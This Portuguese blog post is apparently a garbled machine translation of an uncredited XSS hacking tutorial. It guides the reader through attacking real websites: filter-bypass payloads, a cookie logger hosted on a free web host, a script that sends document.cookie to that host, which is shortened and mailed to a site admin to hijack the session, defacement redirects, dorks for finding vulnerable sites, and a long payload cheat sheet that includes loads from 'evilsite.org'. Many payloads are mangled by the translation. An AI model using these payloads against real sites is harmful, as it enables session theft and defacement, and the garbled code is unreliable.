Então vamos começar
O que é XSS?
XSS representa Cross-Site Scripting. É basicamente um ataque, que é usado para executar código HTML e Javascript na página da web. Este ataque pode ser feito através da apresentação de consultas em caixas de texto, ou mesmo na URL. Os resultados voltar a ler o texto como HTML, então ele executa os scripts em vez de exibi-las em texto simples. Com um ataque XSS, você pode roubar cookies de um Web-administrador, ou mesmo usar um pouco de engenharia social para manipular alguém para fazer download de um vírus que você criou. Tal como um botnet, ou RAT, talvez até um Keylogger. XSS pode ser muito perigosa, mas também pode ser muito suave. A maioria dos meus são ataques XSS leves, que podem ser difíceis de usar contra um site. Há muitas maneiras de usar XSS a sua vantagem. Vou citar alguns exemplos. Você pode usar uma caixa de alerta para propaganda de si mesmo, ou alertar o web-admin que você descobriu uma falha de segurança envolvendo XSS. Você também pode configurar um Cookie-Stealer/Logger. Qualquer coisa que você pode fazer com HTML, pode ser usado contra um site com este ataque. Vou explicar alguns dos termos mais importantes associados com XSS.
O que é HTML e Javascript?
HTML
HTML é como uma espécie de linguagem de programação. As distinções entre uma linguagem de programação, e HTML, não estão muito longe. Eles são as duas línguas, que são usados para criar atributos e eventos. HTML é uma linguagem de marcação, que é usado principalmente para criar sites. HTML significa Hyper Text Markup Language-. Você pode usar HTML para criar formas, botões e outras coisas que podem ser usados em uma página web. Eu duvido que você nunca vai encontrar um site que não contém ainda uma pequena quantidade de HTML.
Javascript
Agora, em primeiro lugar, vamos deixar uma coisa bem clara. Há uma enorme diferença entre Java e JavaScript. Java, é uma linguagem que Assemelha-se a C + +, ele pode ser usado em jogos e aplicações. Javascript é uma espécie de similar ao HTML, mas definitivamente diferente de muitas maneiras. Javascript não é usado quase tanto quanto em Páginas do que o HTML é. Javascript é usado, mais em aplicações fora das páginas da web. Como PDFs. Javascript pode ser uma linguagem extremamente útil, juntamente com HTML. Ambos são bastante simples de aprender, e são muito dinâmico.
XSS: atacar
Agora, o nosso primeiro passo é, obviamente, para encontrar um site vulnerável. Encontrar um local vulnerável a XSS é muito mais fácil do que encontrar um site vulnerável a SQLI. O problema é que ele pode levar algum tempo para determinar se o site é realmente vulnerável. Com SQLI, você pode apenas adicionar um pouco ". Mas em XSS, você deve apresentar (às vezes) várias consultas, para testar o seu site de XSS.
Locais mais vulneráveis irá conter uma pesquisa, Login, ou uma área de registo. Praticamente qualquer lugar que contém uma caixa de texto, pode ser explorada com XSS. Entretanto, muitas pessoas esquecem desse fato, e nunca usá-lo para o seu pleno potencial, porque acho que é inútil. Você pode explorar XSS através da fonte também. Você não pode simplesmente tomar qualquer script, e editar a coisa completa. Mas a edição de um "onmouseover" script, é definitivamente uma exceção.
De qualquer forma, nosso site deve ter algumas caixas de texto-para-entrada um pouco de HTML dentro Eu simplesmente estar usando uma barra de pesquisa.
Então, vamos tentar colocar em consulta a mais conhecida, BASIC de todos os tempos.
<script> alert ("XSS") </ script>
Esse pequeno script, é HTML. Ele vai fazer uma pequena mensagem pop-se, dizendo: "XSS". Você pode editar essa parte se quiser. Só não editar qualquer outras partes do script. Coloque isso em sua barra de pesquisa e pressione Enter. Agora, se uma caixa de alerta pouco apareceu, você atacou com sucesso um site vulnerável a XSS! Se nenhuma caixa de aparecer, que é bom, porque significa que o site tem tido algum tempo para colocar em um filtro. Um filtro, é quando buscamos algo, então ele passa por um processo de mini, basicamente, uma inspeção. Ela verifica se há qualquer mal-intencionados (perigoso) coisas. Neste caso, ele vai olhar para XSS. Às vezes, esses filtros são muito fracos, e pode ser contornado facilmente, outras vezes, eles podem ser bastante difícil de ultrapassar. Há uma série de maneiras de contornar um filtro de XSS. Primeiro, temos de descobrir o que o filtro é bloquear. Uma grande parte do tempo, é Blockin o alerta. Aqui está um exemplo deste tipo de filtro:
<script> alerta (> XSS DETECTADO <) </ script>
Ele irá bloquear as aspas. Então, como diabos vamos conseguir passar isso? Bem, felizmente, há uma maneira de criptografar a mensagem completa. Nós estaremos usando uma função pequena chamada "String.fromCharCode". O nome que explica muito bem tudo isso. Ele criptografa nosso texto, em ASCII. Um exemplo disso criptografia, seria assim:
<script> alerta (String.fromCharCode (88,83,83)) </ script>
abaixo estão alguns códigos Você pode tentar
"> <script> Alert (" XSS ") </ script>
"> <script> Alerta (String.fromCharCode (88,83,83)) </ script>
'> <script> Alert ("XSS") </ script>
'> <script> Alerta (String.fromCharCode (88,83,83)) </ script>
<script> Alert ("XSS") </ script>
<<Script de alerta (String.fromCharCode (88,83,83)) </ script>
"> <script> Alert (" XSS ") </ script>
"> <<Script de alerta (String.fromCharCode (88,83,83)) </ script>
'> <script> Alert ("XSS") </ script>
'> <Script <alerta (String.fromCharCode (88,83,83)) </ script>
</ Script> <script> alert ("XSS") </ script>
</ Script> <script> alerta (String.fromCharCode (88,83,83)) </ script>
"/> <script> Alert (" XSS ") </ script>
"/> Alerta <script> (String.fromCharCode (88,83,83)) </ script>
"/> <script> Alert (" XSS ") </ script>
"/> Alerta <script> (String.fromCharCode (88,83,83)) </ script>
</ SCRIPT> "> alerta <SCRIPT> (" XSS ") </ SCRIPT>
</ SCRIPT> "alerta <SCRIPT>> (String.fromCharCode (88,83,83))
</ SCRIPT> ">" alerta <SCRIPT>> ("XSS") </ SCRIPT>
</ SCRIPT> ">"> alerta <SCRIPT> (String.fromCharCode (88,83,83)) </ SCRIPT>
"; Alert (" XSS ");"
"; Alerta (String.fromCharCode (88,83,83));"
'; Alert ("XSS"); "
'; Alerta (String.fromCharCode (88,83,83)); "
"; Alert (" XSS ")
"; Alerta (String.fromCharCode (88,83,83))
'; Alert ("XSS")
'; Alerta (String.fromCharCode (88,83,83))
Biscoito Roubar / Registro
Agora, biscoito roubar é a coisa mais malicioso que podemos fazer com XSS não persistente. Um cookie ladrão / logger, irá registrar os cookies do usuário que acessar a página de um determinado documento. A maneira mais fácil de fazer isso, seria com um processo de três passos.
Primeiro, você deve configurar um site. Pessoalmente, eu uso http://www.000webhost.com/ o melhor para o código malicioso de upload, programas ou qualquer outra coisa. Então vá em frente e registrar lá.
Agora, uma vez que você criou seu site, vá para o gerenciador de arquivos. Crie um novo arquivo. Chame-lhe "CookieLog.txt". Deixe em branco o código. Agora, criar um outro arquivo, depois disso, chamados de "cookielogger.php". Em cookielogger.php, precisamos adicionar um código, de modo que ele envia os cookies que nós registramos, em nosso Log Cookie. Adicione este código, para ele (Apenas certifique-se o nome do arquivo tem. Php, ou então ele não vai executar o código PHP (que é um enorme problema)).
http://pastebin.com/ebFHJ5qj
Agora que temos nosso script Logger Cookie, podemos enviar o madeireiro cookie para o nosso melhor amigo, o Web Admin. Para fazer isso, devemos provavelmente minúsculo do URL. Ou se você pode descobrir como falsificar a URL, que irá trabalhar também.
A pequenos a URL, vá para http://www.tinyurl.com/ e basta colocar na URL. Mas espere, nós precisamos adicionar um script em nossa vulnerabilidade XSS. Este é o script que vai começar a nossa Logging Cookie.
document.location <script> = "http://www.host.com/mysite/CookieLogger.php?cookie =" + document.cookie; </ script>
Então, basta adicionar esse script após a URL, então pequena, e enviá-lo para o nosso Web Admin, agora isso pode levar algum tempo para o administrador que realmente clique nele. Às vezes, o administrador não clique nele, assim que se leva muito tempo, você deve desistir e encontrar outra maneira de explorá-la.
Depois de conseguir o cookie, você pode usar "Cookie Manager" complemento do Firefox para manipular e editar os cookies para que você pode roubar a sessão de administradores. Acho Cookie Manager um aplicativo muito útil para XSS, certifique-se de fazer o download.
Desfigurar
Pichação é uma das coisas mais comuns que as pessoas gostam de fazer quando têm acesso a opções de administrador múltiplos. Principalmente para que eles possam anunciar-se, e simplesmente deixar o administrador sabe que sua segurança foi violada. De qualquer forma, desfigurar com XSS requer XSS persistente, talvez uma caixa de comentário, ou algo assim. Você pode usar este script para criar uma re-direta para sua página desfigurar (Você provavelmente deve redirecioná-lo para o seu desfigurar em Pastehtml.com, porque é o upload anônimo.)
window.location = <script> "http://www.pastehtml.com/YOURDEFACEHERE/"; </ script>
Alguns Dorks XSS
Geralmente é melhor para criar / encontrar seus próprios nerds, mas neste tutorial, vou escrever algumas rápidas-se real para compartilhar:
inurl: search.php?
inurl: find.php?
inurl: search.html
inurl: find.html
inurl: Search.aspx
inurl: find.aspx
XSS Dorks
Código:
inurl: ".? php cmd ="
inurl: ".? php z ="
inurl: ".? php q ="
inurl: ".? php search ="
inurl: ".? php query ="
inurl: ".? php searchstring ="
inurl: ".? php palavra-chave ="
inurl: ".? php file ="
inurl: ".? php ano ="
inurl: ".? php txt ="
inurl: ".? php tag ="
inurl: ".? php max ="
inurl: ".? php ="
inurl: ".? php autor ="
inurl: ".? php passe ="
inurl: ".? php retorno ="
inurl: ".? php mail ="
inurl: ".? php cat ="
inurl: ".? php voto ="
inurl:? search.php q =
inurl: com_feedpostold / feedpost.php url =?
inurl:? scrapbook.php id =
inurl:? headersearch.php sid =
inurl :/ enquete / default.asp? catid =
inurl :/ search_results.php busca? =
Cheats XSS
Código:
''; -! "<XSS> = & {()}
'> / / \ \ <'> ">"> "*"
'); Alert (' XSS
<script> alerta (1); </ script>
<script> alert ('XSS'); </ script>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
Alerta <SCRIPT> <IMG """> ("XSS") </ SCRIPT> ">
<script src="http://www.evilsite.org/cookiegrabber.php"> </ script>
<<script> Scr ipt> alert ('XSS'); </ scr </ script> IPT>
<script> alerta (String.fromCharCode (88,83,83)) </ script>
<img src=foo.png onerror=alert(/xssed/) />
<style> @ im \ port '\ ja \ vasc \ ript: alert (\ "XSS \") "; </ style>
<? echo ('<scr)'; alerta echo('ipt> (\ "XSS \") </ script>');>
<marquee> <script> alert ('XSS') </ script> </ marquee>
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"> <script> Alerta (0) </ script>
<script src=http://yoursite.com/your_files.js> </ script>
</ Title> <script> alerta (/ xss /) </ script>
</ Textarea> <script> alerta (/ xss /) </ script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
<img src="javascript:alert('XSS')">
<script alerta language="JavaScript"> ('XSS') </ script>
<body onunload="javascript:alert('XSS');">
<OnLoad corpo = "alert ('XSS');"
[Color = red 'onmouseover = "alert (' XSS ')"] do mouse sobre [/ color]
"/> </ A> </> <img src=1.gif onerror=alert(1)>
window.alert ("Bonjour!");
<Div style = "x: expressão ((window.r == 1)'':? Eval ('r = 1;
alert (String.fromCharCode (88,83,83)); ')) ">
<Iframe <? Php echo chr (11)?> Onload = alert ('XSS')> </ iframe>
"> <Script alert (String.fromCharCode (88,83,83)) </ script>
'>> <marquee> <h1> XSS </ h1> </ marquee>
"Alerta <script> >> ('XSS') </ script>
">> <marquee> <h1> XSS </ h1> </ marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<script> var var = 1; alerta (var) </ script>
<STYLE CORPO type="text/css"> {background: url ("javascript: alert ('XSS')")} </ STYLE>
<? = 'Alerta <SCRIPT> ("XSS") </ SCRIPT>'>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
"Onfocus = alert (document.domain)"> <"
<FRAMESET> <FRAME SRC=\"javascript:alert('XSS');\"> </ FRAMESET>
<STYLE> Li {list-style-image: url (\ "javascript: alert ('XSS') \");} </ style> <UL> <LI> XSS
'print \ "<SCR\0IPT> alert (\" XSS \ ") </ SCR \ 0IPT> \";' perl-e> fora
'print \ "<IMG SRC=java\0script:alert(\"XSS\")> \";' perl-e> fora
size=\"&{alert('XSS')}\"> <br
<scrscriptipt> alerta (1) <scrscriptipt />
</ Style = br a: expressão (alert ())>
</ Script> <script> alerta (1) </ script>
"> <BODY Onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[Color = largura vermelho = expressão (alert (123))] [color]
<BASE HREF="javascript:alert('XSS');//">
Executar (MsgBox (chr (88) & chr (83) & chr (83))) <
"> </ Iframe> <script> alerta (123) </ script>
<body onLoad="while(true) alert('XSS');">
""> </ Title alerta <script>> (1111) </ script>
</ Textarea> "> <script> alert (document.cookie) </ script>
"" "> Alerta language="JavaScript"> <script ('X \ nS \ nS'); </ script>
</ Script> </ script> <<<< script> <>>>> <<< script> alerta (123) </ script>
<html> <noscript> <noalert> (123) </ noscript> <script> (123) </ script>
<INPUT Type="image" SRC="javascript:alert('XSS');">
'> </ Select> <script> alerta (123) </ script>
">"> Src = <script'http://www.site.com/XSS.js'> </ script>
} </ Style> <script> a = eval b = alerta, a (b (/ XSS / .source)); </ script>
Document.write <SCRIPT> ("XSS"); </ SCRIPT>
a = "get" b = "URL"; c = "javascript:", d = "alert ('XSS');" eval (a + b + c + d);
= 'Alerta <script>> ("XSS") </ script>
<script+src="> "+ src =" http://yoursite.com/xss.js?69% 2C69 "> </ script>
<body alerta <script> background=javascript:'"> (navigator.userAgent) </ script >> </ body>
"> / XaDoS / alerta <script>> (document.cookie) </ script> <script src="http://www.site.com/XSS.js"> </ script>
"> / King-InFeT.NeT /> alerta <script> (document.cookie) </ script>
src = "http://www.site.com/XSS.js"> </ script>
dados: text / html; charset = UTF-7; base64, Ij48L3RpdGxlPjxzY3JpcHQ + YWxlcnQoMTMzNyk8L3NjcmlwdD4 =
! - "/> <script> Alert ('XSS'); </ script>
<script> alert ("XSS por \ nxss") </ script> <marquee> <h1> XSS por xss </ h1> </ marquee>
"> <script> Alert (" XSS por \ nxss ") </ script >> XSS <marquee> <h1> por xss </ h1> </ marquee>
""> </ Title> <script> alert ("XSS por \ nxss") </ script >> XSS <marquee> <h1> por xss </ h1> </ marquee>
<img alerta <script> """> ("XSS por \ nxss") </ script> <marquee> <h1> XSS por xss </ h1> </ marquee>
alerta <script> (1337) </ script> <marquee> <h1> XSS por xss </ h1> </ marquee>
"> Alerta <script> (1337) </ script>"> <script> alert ("XSS por \ nxss </ h1> </ marquee>
""> </ Title alerta <script>> (1337) </ script >> XSS <marquee> <h1> por xss </ h1> </ marquee>
<iframe src="javascript:alert('XSS por \nxss');"> </ iframe> <marquee> <h1> XSS por xss </ h1> </ marquee>...
OBS : TUTO NAUM É MEU ! AUTOR DESCOLHECIDO;
Nenhum comentário:
Postar um comentário